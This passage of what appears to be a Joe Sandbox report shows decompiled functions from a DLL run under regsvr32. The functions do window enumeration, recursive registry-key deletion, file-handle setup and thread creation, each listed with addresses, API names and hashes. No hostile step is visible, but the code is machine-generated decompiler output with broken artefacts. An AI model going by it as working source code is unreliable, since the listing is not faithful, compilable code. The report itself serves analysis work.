                                                                                                                			E1001A6FA(signed int __ebx, signed int __ecx, void* __edi, void* __esi, void* __eflags) {
				struct HWND__* _t29;
				signed int _t33;
				signed short _t37;
				signed int _t39;
				struct HWND__* _t54;
				void* _t55;
				void* _t56;

				_t56 = __eflags;
				_t43 = __ebx;
				_push(0x80);
				E1003D1E6(E10052F96, __ebx, __edi, __esi);
				 *(_t55 - 0x10) = __ecx;
				E1001CDB8(_t55 - 0x38);
				_t46 = _t55 - 0x8c;
				E10018895(_t55 - 0x8c, _t56);
				 *(_t55 - 4) = 0;
				_t29 = GetTopWindow( *(__ecx + 0x20));
				while(1) {
					_t54 = _t29;
					if(_t54 == 0) {
						break;
					}
					 *(_t55 - 0x6c) = _t54;
					 *(_t55 - 0x34) = GetDlgCtrlID(_t54) & 0x0000ffff;
					 *((intOrPtr*)(_t55 - 0x24)) = _t55 - 0x8c;
					_t33 = E10019C3D(_t46, 0, _t54, __eflags, _t54);
					__eflags = _t33;
					if(_t33 == 0) {
						L3:
						_t46 =  *(_t55 - 0x10);
						__eflags = E1001CC4A(_t43,  *(_t55 - 0x10), _t54,  *(_t55 - 0x34), 0xffffffff, _t55 - 0x38, 0);
						if(__eflags == 0) {
							_t43 =  *(_t55 + 0xc);
							__eflags = _t43;
							if(_t43 != 0) {
								_t37 = SendMessageA( *(_t55 - 0x6c), 0x87, 0, 0);
								__eflags = _t37 & 0x00002000;
								if((_t37 & 0x00002000) == 0) {
									L10:
									_t43 = 0;
									__eflags = 0;
								} else {
									_t39 = E1001D23C(_t55 - 0x8c) & 0x0000000f;
									__eflags = _t39 - 3;
									if(_t39 == 3) {
										goto L10;
									} else {
										__eflags = _t39 - 6;
										if(_t39 == 6) {
											goto L10;
										} else {
											__eflags = _t39 - 7;
											if(_t39 == 7) {
												goto L10;
											} else {
												__eflags = _t39 - 9;
												if(_t39 == 9) {
													goto L10;
												}
											}
										}
									}
								}
							}
							_t46 = _t55 - 0x38;
							E1001CDDE(_t55 - 0x38,  *((intOrPtr*)(_t55 + 8)), _t43);
						}
					} else {
						_t46 = _t33;
						__eflags = E1001CC4A(_t43, _t33, _t54, 0, 0xbd11ffff, _t55 - 0x38, 0);
						if(__eflags == 0) {
							goto L3;
						}
					}
					_t29 = GetWindow(_t54, 2);
				}
				_t21 = _t55 - 4;
				 *(_t55 - 4) =  *(_t55 - 4) | 0xffffffff;
				 *(_t55 - 0x6c) = 0;
				return E1003D2BE(E1001A3E3(_t43, _t55 - 0x8c, 0, _t54,  *_t21));
			}










                                                                                                                0x1001a6fa
                                                                                                                0x1001a6fa
                                                                                                                0x1001a6fa
                                                                                                                0x1001a704
                                                                                                                0x1001a70b
                                                                                                                0x1001a711
                                                                                                                0x1001a716
                                                                                                                0x1001a71c
                                                                                                                0x1001a726
                                                                                                                0x1001a729
                                                                                                                0x1001a7d9
                                                                                                                0x1001a7d9
                                                                                                                0x1001a7dd
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x1001a735
                                                                                                                0x1001a741
                                                                                                                0x1001a74b
                                                                                                                0x1001a74e
                                                                                                                0x1001a753
                                                                                                                0x1001a755
                                                                                                                0x1001a76d
                                                                                                                0x1001a76d
                                                                                                                0x1001a77f
                                                                                                                0x1001a781
                                                                                                                0x1001a783
                                                                                                                0x1001a786
                                                                                                                0x1001a788
                                                                                                                0x1001a794
                                                                                                                0x1001a79a
                                                                                                                0x1001a79e
                                                                                                                0x1001a7c2
                                                                                                                0x1001a7c2
                                                                                                                0x1001a7c2
                                                                                                                0x1001a7a0
                                                                                                                0x1001a7ab
                                                                                                                0x1001a7ae
                                                                                                                0x1001a7b1
                                                                                                                0x00000000
                                                                                                                0x1001a7b3
                                                                                                                0x1001a7b3
                                                                                                                0x1001a7b6
                                                                                                                0x00000000
                                                                                                                0x1001a7b8
                                                                                                                0x1001a7b8
                                                                                                                0x1001a7bb
                                                                                                                0x00000000
                                                                                                                0x1001a7bd
                                                                                                                0x1001a7bd
                                                                                                                0x1001a7c0
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x1001a7c0
                                                                                                                0x1001a7bb
                                                                                                                0x1001a7b6
                                                                                                                0x1001a7b1
                                                                                                                0x1001a79e
                                                                                                                0x1001a7c8
                                                                                                                0x1001a7cb
                                                                                                                0x1001a7cb
                                                                                                                0x1001a757
                                                                                                                0x1001a762
                                                                                                                0x1001a769
                                                                                                                0x1001a76b
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x1001a76b
                                                                                                                0x1001a7d3
                                                                                                                0x1001a7d3
                                                                                                                0x1001a7e3
                                                                                                                0x1001a7e3
                                                                                                                0x1001a7ed
                                                                                                                0x1001a7fa

                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.436101324.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.436097453.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.437451450.0000000010056000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.438223626.000000001006C000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.438384188.0000000010073000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Window$CtrlH_prolog3MessageSend
                                                                                                                • String ID:
                                                                                                                • API String ID: 849854284-0
                                                                                                                • Opcode ID: 12cab4c5c9df0587153cfc637b0498b060e230d64710f68d7e1a98f33d35c220
                                                                                                                • Instruction ID: d95d501e835515873e6f3d5e56d1f9e748836c9714b8f44335a593d4f42921f8
                                                                                                                • Opcode Fuzzy Hash: 12cab4c5c9df0587153cfc637b0498b060e230d64710f68d7e1a98f33d35c220
                                                                                                                • Instruction Fuzzy Hash: F4219A35804119AADB15EBA0DC85EAEBBF8FF56750F10411AF456EB0D1EA30DEC1DBA0
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 100220F7 Relevance: 7.6, APIs: 5, Instructions: 79windowCOMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 96%
                                                                                                                			E100220F7(void* __ebx, void* __ecx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				long _t42;
				long _t45;
				long _t52;
				void* _t65;
				void* _t69;
				void* _t75;
				void* _t79;

				_t73 = __edx;
				_push(8);
				E1003D1E6(E1005365D, __ebx, __edi, __esi);
				_t75 = __ecx;
				 *(_t79 - 0x14) = 0;
				if(( *( *((intOrPtr*)(__ecx + 0x74)) + 0x34) & 0x00080000) == 0 ||  *((intOrPtr*)(__ecx + 0x20)) == 0) {
					L9:
					E10005030(_t73, _t79,  *((intOrPtr*)( *((intOrPtr*)(_t75 + 0x74)) + 0x1c)));
				} else {
					E10001050(_t79 - 0x10, __edx, E100173A6());
					 *(_t79 - 4) = 0;
					_t42 = E10001C60(_t79 - 0x10, 0x104);
					_t60 = GetParent;
					 *(_t79 - 0x14) = _t42;
					_t45 = SendMessageA( *(E10019C16(GetParent, _t79 - 0x10, _t79, GetParent( *(_t75 + 0x20))) + 0x20), 0x464, 0x104,  *(_t79 - 0x14));
					_t65 = _t79 - 0x10;
					if(_t45 >= 0) {
						E10019B0F(GetParent, _t65, _t75, 0xffffffff);
					} else {
						E100019E0(_t65);
					}
					if( *((intOrPtr*)( *((intOrPtr*)(_t79 - 0x10)) - 0xc)) == 0) {
						L8:
						 *(_t79 - 4) =  *(_t79 - 4) | 0xffffffff;
						E10001020( *((intOrPtr*)(_t79 - 0x10)) + 0xfffffff0, _t73);
						goto L9;
					} else {
						 *(_t79 - 0x14) = E10001C60(_t79 - 0x10, 0x104);
						_t52 = SendMessageA( *(E10019C16(_t60, _t79 - 0x10, _t79, GetParent( *(_t75 + 0x20))) + 0x20), 0x465, 0x104,  *(_t79 - 0x14));
						_t69 = _t79 - 0x10;
						if(_t52 >= 0) {
							E10019B0F(_t60, _t69, _t75, 0xffffffff);
							E10001140( *((intOrPtr*)(_t79 + 8)), __eflags, _t79 - 0x10);
							E10001020( *((intOrPtr*)(_t79 - 0x10)) + 0xfffffff0, _t73);
						} else {
							E100019E0(_t69);
							goto L8;
						}
					}
				}
				return E1003D2BE( *((intOrPtr*)(_t79 + 8)));
			}










                                                                                                                0x100220f7
                                                                                                                0x100220f7
                                                                                                                0x100220fe
                                                                                                                0x10022103
                                                                                                                0x10022111
                                                                                                                0x10022114
                                                                                                                0x100221ca
                                                                                                                0x100221d3
                                                                                                                0x10022123
                                                                                                                0x1002212c
                                                                                                                0x10022131
                                                                                                                0x1002213d
                                                                                                                0x10022145
                                                                                                                0x1002214b
                                                                                                                0x10022162
                                                                                                                0x1002216a
                                                                                                                0x1002216d
                                                                                                                0x10022178
                                                                                                                0x1002216f
                                                                                                                0x1002216f
                                                                                                                0x1002216f
                                                                                                                0x10022184
                                                                                                                0x100221bb
                                                                                                                0x100221be
                                                                                                                0x100221c5
                                                                                                                0x00000000
                                                                                                                0x10022186
                                                                                                                0x10022192
                                                                                                                0x100221a9
                                                                                                                0x100221b1
                                                                                                                0x100221b4
                                                                                                                0x100221e5
                                                                                                                0x100221f1
                                                                                                                0x100221fc
                                                                                                                0x100221b6
                                                                                                                0x100221b6
                                                                                                                0x00000000
                                                                                                                0x100221b6
                                                                                                                0x100221b4
                                                                                                                0x10022184
                                                                                                                0x100221e0

                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.436101324.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.436097453.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.437451450.0000000010056000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.438223626.000000001006C000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.438384188.0000000010073000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: MessageParentSend$H_prolog3
                                                                                                                • String ID:
                                                                                                                • API String ID: 1482283565-0
                                                                                                                • Opcode ID: b153e555a7cb6d8ced71ce106a1a3a49bb70b7c8d57b55e96d703d60e1cf100b
                                                                                                                • Instruction ID: eff1c64d9807f60192a5bcbc1d1dea6d10616ecf9b1d23ee537e2d346d076b4b
                                                                                                                • Opcode Fuzzy Hash: b153e555a7cb6d8ced71ce106a1a3a49bb70b7c8d57b55e96d703d60e1cf100b
                                                                                                                • Instruction Fuzzy Hash: ED31BD75A00219EFDB05DFA0CD96EAEBBB4FF043A0B000215F5616B1E6DB30AA50DB91
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 10025F1C Relevance: 7.6, APIs: 5, Instructions: 75registryCOMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 84%
                                                                                                                			E10025F1C(signed int __ebx, void* __edi, void* __esi, void* __eflags) {
				void* __ebp;
				signed int _t25;
				signed int _t30;
				void* _t32;
				signed int _t34;
				signed int _t42;
				void* _t43;
				void* _t44;
				char** _t54;
				void* _t55;
				void* _t58;
				char* _t59;
				void* _t61;

				_t42 = __ebx;
				_t59 = _t61 - 0x104;
				_t25 =  *0x1006dbdc; // 0xdf7c0cda
				_t59[0x108] = _t25 ^ _t59;
				_push(0x18);
				E1003D219(E10053AC4, __ebx, __edi, __esi);
				_t54 = _t59[0x118];
				_t44 = _t59[0x114];
				_t52 = _t59 - 0x18;
				 *(_t59 - 0x20) = _t44;
				 *(_t59 - 0x1c) = _t54;
				_t30 = RegOpenKeyA(_t44,  *_t54, _t59 - 0x18);
				_t57 = _t30;
				if(_t30 == 0) {
					while(1) {
						_t34 = RegEnumKeyA( *(_t59 - 0x18), 0, _t59, 0x104);
						_t57 = _t34;
						_t66 = _t57;
						if(_t57 != 0) {
							break;
						}
						 *(_t59 - 4) =  *(_t59 - 4) & _t34;
						E10005030(_t52, _t59, _t59);
						 *(_t59 - 4) = 1;
						_t57 = E10025F1C(_t42, _t54, _t57, _t66,  *(_t59 - 0x18), _t59 - 0x14);
						_t42 = _t42 & 0xffffff00 | _t57 != 0x00000000;
						 *(_t59 - 4) = 0;
						E10001020( *((intOrPtr*)(_t59 - 0x14)) + 0xfffffff0, _t52);
						if(_t42 == 0) {
							 *(_t59 - 4) =  *(_t59 - 4) | 0xffffffff;
							continue;
						}
						break;
					}
					__eflags = _t57 - 0x103;
					if(_t57 == 0x103) {
						L6:
						_t57 = RegDeleteKeyA( *(_t59 - 0x20),  *_t54);
					} else {
						__eflags = _t57 - 0x3f2;
						if(_t57 == 0x3f2) {
							goto L6;
						}
					}
					RegCloseKey( *(_t59 - 0x18));
				}
				 *[fs:0x0] =  *((intOrPtr*)(_t59 - 0xc));
				_pop(_t55);
				_pop(_t58);
				_pop(_t43);
				_t32 = E1003B437(_t57, _t43, _t59[0x108] ^ _t59, _t52, _t55, _t58);
				__eflags =  &(_t59[0x10c]);
				return _t32;
			}
















                                                                                                                0x10025f1c
                                                                                                                0x10025f23
                                                                                                                0x10025f27
                                                                                                                0x10025f2e
                                                                                                                0x10025f34
                                                                                                                0x10025f3b
                                                                                                                0x10025f40
                                                                                                                0x10025f48
                                                                                                                0x10025f4e
                                                                                                                0x10025f54
                                                                                                                0x10025f57
                                                                                                                0x10025f5a
                                                                                                                0x10025f60
                                                                                                                0x10025f64
                                                                                                                0x10025f6a
                                                                                                                0x10025f78
                                                                                                                0x10025f7e
                                                                                                                0x10025f80
                                                                                                                0x10025f82
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x10025f84
                                                                                                                0x10025f8e
                                                                                                                0x10025f9a
                                                                                                                0x10025fa6
                                                                                                                0x10025faa
                                                                                                                0x10025fb0
                                                                                                                0x10025fb4
                                                                                                                0x10025fbb
                                                                                                                0x10025fbd
                                                                                                                0x00000000
                                                                                                                0x10025fbd
                                                                                                                0x00000000
                                                                                                                0x10025fbb
                                                                                                                0x10025fde
                                                                                                                0x10025fe4
                                                                                                                0x10025fee
                                                                                                                0x10025ff9
                                                                                                                0x10025fe6
                                                                                                                0x10025fe6
                                                                                                                0x10025fec
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x10025fec
                                                                                                                0x10025ffe
                                                                                                                0x10025ffe
                                                                                                                0x10026009
                                                                                                                0x10026011
                                                                                                                0x10026012
                                                                                                                0x10026013
                                                                                                                0x1002601c
                                                                                                                0x10026021
                                                                                                                0x10026028

                                                                                                                APIs
                                                                                                                • __EH_prolog3_catch.LIBCMT ref: 10025F3B
                                                                                                                • RegOpenKeyA.ADVAPI32(?,00000000,?), ref: 10025F5A
                                                                                                                • RegEnumKeyA.ADVAPI32(?,00000000,00000000,00000104), ref: 10025F78
                                                                                                                • RegDeleteKeyA.ADVAPI32(?,?), ref: 10025FF3
                                                                                                                • RegCloseKey.ADVAPI32(?), ref: 10025FFE
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.436101324.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.436097453.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.437451450.0000000010056000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.438223626.000000001006C000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.438384188.0000000010073000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: CloseDeleteEnumH_prolog3_catchOpen
                                                                                                                • String ID:
                                                                                                                • API String ID: 3522057324-0
                                                                                                                • Opcode ID: 420f038bc46650a4cd1f1d3a290e666fe69e2596bfbc6e69b46c67e3b7788df5
                                                                                                                • Instruction ID: b2a7dd213501d3c3d9ee7ff6652eb151e949eb3d59d1a8e29eea62385233ddcb
                                                                                                                • Opcode Fuzzy Hash: 420f038bc46650a4cd1f1d3a290e666fe69e2596bfbc6e69b46c67e3b7788df5
                                                                                                                • Instruction Fuzzy Hash: 7121F035D0025ADFDB61DB94DD41BEEB7B4EF08321F500126E981A72D0DB305E44DB90
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 1003F949 Relevance: 7.6, APIs: 5, Instructions: 71COMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 95%
                                                                                                                			E1003F949(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				long _t27;
				signed int _t34;
				signed int _t36;
				signed char _t42;
				intOrPtr* _t46;
				void* _t49;
				signed int _t56;
				void* _t57;

				_t55 = __esi;
				_t49 = __edx;
				_push(0xc);
				_push(0x10068c20);
				E1003D578(__ebx, __edi, __esi);
				 *(_t57 - 0x1c) = 0;
				_t42 = 0;
				if(( *(_t57 + 0xc) & 0x00000008) != 0) {
					_t42 = 0x20;
				}
				if(( *(_t57 + 0xc) & 0x00004000) != 0) {
					_t42 = _t42 | 0x00000080;
				}
				if(( *(_t57 + 0xc) & 0x00000080) != 0) {
					_t42 = _t42 | 0x00000010;
				}
				_t27 = GetFileType( *(_t57 + 8));
				if(_t27 != 0) {
					__eflags = _t27 - 2;
					if(__eflags != 0) {
						__eflags = _t27 - 3;
						if(__eflags == 0) {
							_t42 = _t42 | 0x00000008;
							__eflags = _t42;
						}
					} else {
						_t42 = _t42 | 0x00000040;
					}
					_t56 = E1003F7AA(_t42, _t49, 0, _t55, __eflags);
					 *(_t57 + 0xc) = _t56;
					__eflags = _t56 - 0xffffffff;
					if(__eflags != 0) {
						 *((intOrPtr*)(_t57 - 4)) = 0;
						E1003F579(_t42, _t56,  *(_t57 + 8));
						_t46 = 0x10071ac0 + (_t56 >> 5) * 4;
						_t34 = (_t56 & 0x0000001f) * 0x28;
						 *( *_t46 + _t34 + 4) = _t42 | 0x00000001;
						 *( *_t46 + _t34 + 0x24) =  *( *_t46 + _t34 + 0x24) & 0x00000080;
						 *( *_t46 + _t34 + 0x24) =  *( *_t46 + _t34 + 0x24) & 0x0000007f;
						 *(_t57 - 0x1c) = 1;
						 *((intOrPtr*)(_t57 - 4)) = 0xfffffffe;
						_t36 = E1003FA36(0, _t56);
						__eflags =  *(_t57 - 0x1c);
						if( *(_t57 - 0x1c) == 0) {
							goto L8;
						}
						_t37 = _t56;
						goto L9;
					} else {
						 *((intOrPtr*)(E1003D47E(__eflags))) = 0x18;
						_t36 = E1003D491(__eflags);
						 *_t36 = 0;
						goto L8;
					}
				} else {
					_t36 = E1003D4A4(GetLastError());
					L8:
					_t37 = _t36 | 0xffffffff;
					L9:
					return E1003D5BD(_t37);
				}
			}











                                                                                                                0x1003f949
                                                                                                                0x1003f949
                                                                                                                0x1003f949
                                                                                                                0x1003f94b
                                                                                                                0x1003f950
                                                                                                                0x1003f957
                                                                                                                0x1003f95a
                                                                                                                0x1003f960
                                                                                                                0x1003f962
                                                                                                                0x1003f962
                                                                                                                0x1003f96b
                                                                                                                0x1003f96d
                                                                                                                0x1003f96d
                                                                                                                0x1003f974
                                                                                                                0x1003f976
                                                                                                                0x1003f976
                                                                                                                0x1003f97c
                                                                                                                0x1003f984
                                                                                                                0x1003f99c
                                                                                                                0x1003f99f
                                                                                                                0x1003f9a6
                                                                                                                0x1003f9a9
                                                                                                                0x1003f9ab
                                                                                                                0x1003f9ab
                                                                                                                0x1003f9ab
                                                                                                                0x1003f9a1
                                                                                                                0x1003f9a1
                                                                                                                0x1003f9a1
                                                                                                                0x1003f9b3
                                                                                                                0x1003f9b5
                                                                                                                0x1003f9b8
                                                                                                                0x1003f9bb
                                                                                                                0x1003f9d1
                                                                                                                0x1003f9d8
                                                                                                                0x1003f9e7
                                                                                                                0x1003f9f3
                                                                                                                0x1003f9f8
                                                                                                                0x1003fa02
                                                                                                                0x1003fa0b
                                                                                                                0x1003fa0e
                                                                                                                0x1003fa15
                                                                                                                0x1003fa1c
                                                                                                                0x1003fa21
                                                                                                                0x1003fa24
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x1003fa2a
                                                                                                                0x00000000
                                                                                                                0x1003f9bd
                                                                                                                0x1003f9c2
                                                                                                                0x1003f9c8
                                                                                                                0x1003f9cd
                                                                                                                0x00000000
                                                                                                                0x1003f9cd
                                                                                                                0x1003f986
                                                                                                                0x1003f98d
                                                                                                                0x1003f993
                                                                                                                0x1003f993
                                                                                                                0x1003f996
                                                                                                                0x1003f99b
                                                                                                                0x1003f99b

                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.436101324.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.436097453.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.437451450.0000000010056000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.438223626.000000001006C000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.438384188.0000000010073000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: ErrorFileLastType__alloc_osfhnd__dosmaperr__set_osfhnd
                                                                                                                • String ID:
                                                                                                                • API String ID: 43408053-0
                                                                                                                • Opcode ID: 4d80846e16eb1202dfe639fb837b8850852b5d75ce4fe7bf4f375aa722c3bfda
                                                                                                                • Instruction ID: f269f83d55b24e5bd8462084fb6d5c2141c54d8dce9e7613424e65711a3cc68f
                                                                                                                • Opcode Fuzzy Hash: 4d80846e16eb1202dfe639fb837b8850852b5d75ce4fe7bf4f375aa722c3bfda
                                                                                                                • Instruction Fuzzy Hash: FA21F134901645AEDB03DF34C8017AD7B90EF46365F28864EE4E48F1E2C7789A41CF81
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 10040AD8 Relevance: 7.6, APIs: 5, Instructions: 70threadCOMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 20%
                                                                                                                			E10040AD8(void* __edx, struct _SECURITY_ATTRIBUTES* _a4, long _a8, char _a12, intOrPtr _a16, long _a20, DWORD* _a24) {
				DWORD* _v8;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				void* _t20;
				DWORD* _t25;
				intOrPtr* _t27;
				char _t41;
				void* _t44;

				_t41 = _a12;
				_t48 = _t41;
				_v8 = 0;
				if(_t41 != 0) {
					E1004296C();
					_t44 = E10046749(1, 0x214);
					__eflags = _t44;
					if(__eflags == 0) {
						L7:
						_push(_t44);
						E1003B59D(0, _t41, _t44, __eflags);
						__eflags = _v8;
						if(_v8 != 0) {
							E1003D4A4(_v8);
						}
						_t20 = 0;
						__eflags = 0;
					} else {
						_push( *((intOrPtr*)(E10042B23(__edx, _t41, __eflags) + 0x6c)));
						_push(_t44);
						E100429EC(0, _t41, _t44, __eflags);
						 *(_t44 + 4) =  *(_t44 + 4) | 0xffffffff;
						 *((intOrPtr*)(_t44 + 0x58)) = _a16;
						_t25 = _a24;
						__eflags = _t25;
						 *((intOrPtr*)(_t44 + 0x54)) = _t41;
						if(_t25 == 0) {
							_t25 =  &_a12;
						}
						_t20 = CreateThread(_a4, _a8, 0x10040a58, _t44, _a20, _t25);
						__eflags = _t20;
						if(__eflags == 0) {
							_v8 = GetLastError();
							goto L7;
						}
					}
				} else {
					_t27 = E1003D47E(_t48);
					_push(0);
					_push(0);
					_push(0);
					_push(0);
					_push(0);
					 *_t27 = 0x16;
					E10041BCB(0, __edx, _t41);
					_t20 = 0;
				}
				return _t20;
			}













                                                                                                                0x10040ade
                                                                                                                0x10040ae3
                                                                                                                0x10040ae5
                                                                                                                0x10040ae8
                                                                                                                0x10040b07
                                                                                                                0x10040b18
                                                                                                                0x10040b1a
                                                                                                                0x10040b1e
                                                                                                                0x10040b6a
                                                                                                                0x10040b6a
                                                                                                                0x10040b6b
                                                                                                                0x10040b70
                                                                                                                0x10040b74
                                                                                                                0x10040b79
                                                                                                                0x10040b7e
                                                                                                                0x10040b7f
                                                                                                                0x10040b7f
                                                                                                                0x10040b20
                                                                                                                0x10040b25
                                                                                                                0x10040b28
                                                                                                                0x10040b29
                                                                                                                0x10040b31
                                                                                                                0x10040b35
                                                                                                                0x10040b38
                                                                                                                0x10040b3b
                                                                                                                0x10040b3f
                                                                                                                0x10040b42
                                                                                                                0x10040b44
                                                                                                                0x10040b44
                                                                                                                0x10040b57
                                                                                                                0x10040b5d
                                                                                                                0x10040b5f
                                                                                                                0x10040b67
                                                                                                                0x00000000
                                                                                                                0x10040b67
                                                                                                                0x10040b5f
                                                                                                                0x10040aea
                                                                                                                0x10040aea
                                                                                                                0x10040aef
                                                                                                                0x10040af0
                                                                                                                0x10040af1
                                                                                                                0x10040af2
                                                                                                                0x10040af3
                                                                                                                0x10040af4
                                                                                                                0x10040afa
                                                                                                                0x10040b02
                                                                                                                0x10040b02
                                                                                                                0x10040b85

                                                                                                                APIs
                                                                                                                • ___set_flsgetvalue.LIBCMT ref: 10040B07
                                                                                                                • __calloc_crt.LIBCMT ref: 10040B13
                                                                                                                • CreateThread.KERNEL32(?,?,10040A58,00000000,?,10023B90), ref: 10040B57
                                                                                                                • GetLastError.KERNEL32(?,74EC13E0,00000000,?,?,10023B90,?,?,100239FB,?,?,?), ref: 10040B61
                                                                                                                • __dosmaperr.LIBCMT ref: 10040B79
                                                                                                                  • Part of subcall function 1003D47E: __getptd_noexit.LIBCMT ref: 1003D47E
                                                                                                                  • Part of subcall function 10041BCB: __decode_pointer.LIBCMT ref: 10041BD4
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000003.00000002.436101324.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                                                                • Associated: 00000003.00000002.436097453.0000000010000000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.437451450.0000000010056000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.438223626.000000001006C000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                • Associated: 00000003.00000002.438384188.0000000010073000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_3_2_10000000_regsvr32.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: CreateErrorLastThread___set_flsgetvalue__calloc_crt__decode_pointer__dosmaperr__getptd_noexit
                                                                                                                • String ID:
                                                                                                                • API String ID: 1067611704-0
                                                                                                                • Opcode ID: dcde6ed9a1b6162f08803f4cb18909c519212f31992b996baf2defafd1b9262e
                                                                                                                • Instruction ID: 6863289db019d166419ad51a82ef1f24fda2c8a3403dc53a6c7794798c414783
                                                                                                                • Opcode Fuzzy Hash: dcde6ed9a1b6162f08803f4cb18909c519212f31992b996baf2defafd1b9262e
                                                                                                                • Instruction Fuzzy Hash: 5611C476501205AFDB01EFA4DC8688E77E8EF04368B714539F505E7051D731AD008AAD
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 100218F9 Relevance: 7.6, APIs: 5, Instructions: 67windowCOMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 83%
                                                                                                                			E100218F9(void* __eflags, struct HWND__* _a4, int _a8, signed int* _a12) {
				void* __ebx;
				struct HWND__* _t28;
				void* _t35;
				intOrPtr* _t42;

				_t42 = _a4;
				E100218BA(_t35, _t42, _a8);
				E1001D1E6( *((intOrPtr*)(_t42 + 4)), _a8,  &_a4);
				if( *_t42 != 0) {
					 *_a12 =  *_a12 | 0xffffffff;
				}
				_a8 = 0;
				L3:
				L3:
				if((SendMessageA(_a4, 0x87, 0, 0) & 0x00000040) != 0) {
					_push(0);
					if( *_t42 == 0) {
						SendMessageA(_a4, 0xf1, 0 | _a8 ==  *_a12, ??);
					} else {
						if(SendMessageA(_a4, 0xf0, 0, ??) != 0) {
							 *_a12 = _a8;
						}
					}
					_a8 = _a8 + 1;
				}
				_t28 = GetWindow(_a4, 2);
				_a4 = _t28;
				if(_t28 == 0) {
					goto L11;
				}
				_t28 = GetWindowLongA(_t28, 0xfffffff0);
				if((_t28 & 0x00020000) == 0) {
					goto L3;
				}
				L11:
				return _t28;
			}







                                                                                                                0x100218ff
                                                                                                                0x10021907
                                                                                                                0x10021916
                                                                                                                0x1002191f
                                                                                                                0x10021924
                                                                                                                0x10021924
                                                                                                                0x1002192d
                                                                                                                0x00000000
                                                                                                                0x10021930
                                                                                                                0x1002193e
                                                                                                                0x10021942
                                                                                                                0x10021943
                                                                                                                0x10021974
                                                                                                                0x10021945
                                                                                                                0x10021952
                                                                                                                0x1002195a
                                                                                                                0x1002195a
                                                                                                                0x10021952
                                                                                                                0x10021976
                                                                                                                0x10021976
                                                                                                                0x1002197e
                                                                                                                0x10021986
                                                                                                                0x10021989
                                                                                                                0x00000000
                                                                                                                0x00000000
